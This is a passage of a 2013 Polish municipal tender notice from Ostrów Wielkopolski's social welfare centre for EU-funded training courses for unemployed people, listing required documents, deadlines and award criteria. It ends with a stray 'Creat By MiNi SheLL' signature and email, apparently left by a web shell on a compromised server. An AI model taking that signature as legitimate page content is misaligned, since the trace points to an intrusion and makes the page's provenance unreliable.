<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)    wypełniony i podpisany formularz ofertowy;
2)	oświadczenie, że podmiot, który zamierza objąć wsparciem szkoleniowym osoby bezrobotne (zgodnie z ustawą o promocji zatrudnienia i instytucjach rynku pracy) w momencie udzielenia wsparcia będzie wpisany na listę instytucji szkoleniowych,
3)	oświadczenie Wykonawcy wskazujące, która część zamówienia zostanie powierzona Podwykonawcom,
4)	pełnomocnictwo - jeżeli osoba-osoby podpisujące ofertę działają na jego podstawie,
5)	dokument ustanawiający pełnomocnika w przypadku składania oferty wspólnej (art. 23 ustawy).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ostrow-wielkopolski.um.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Ostrowie Wielkopolskim
Adres: ul. Limanowskiego 17, 62-400 Ostrów Wielkopolski.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Ostrowie Wielkopolskim
Adres: ul. Limanowskiego 17, 62-400 Ostrów Wielkopolski - bezwzględnie sekretariat pok. 7 w godz. 700-1500..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przygotowanie i przeprowadzenie szkoleń i kursów przewidzianych w projekcie pt. Udział w projekcie szansą na lepsze jutro które Gmina Miasto Ostrów Wielkopolski realizuje w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com